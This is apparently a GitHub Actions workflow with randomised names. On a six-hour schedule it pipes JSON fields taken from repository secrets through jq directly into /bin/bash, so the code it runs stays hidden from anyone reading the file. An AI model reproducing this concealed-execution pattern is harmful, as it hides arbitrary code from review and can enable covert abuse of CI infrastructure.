name: yingjinchaoshang

on:
  workflow_dispatch:
  schedule:
    - cron: '23 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yingjinchaoshang
        env:
          nn75565: ${{ secrets.nn75565 }}
        run: |
          echo $nn75565 | jq -r .vajkk3377 | /bin/bash
          echo $wtjo2791 | jq -r .tdf10420 | /bin/bash
          echo $rdctp8514 | jq -r .fj36 | /bin/bash
          echo $mt295 | jq -r .tmvy8317 | /bin/bash
          echo $cxarc34630 | jq -r .pn07707 | /bin/bash
          echo $wgdv3 | jq -r .qymu8253 | /bin/bash
          echo $aymb95 | jq -r .uap6454 | /bin/bash
          echo $tve3439 | jq -r .mi6713 | /bin/bash
          echo $ocbcz62723 | jq -r .qdetl42 | /bin/bash
          echo $upyy18608 | jq -r .tdgz68861 | /bin/bash

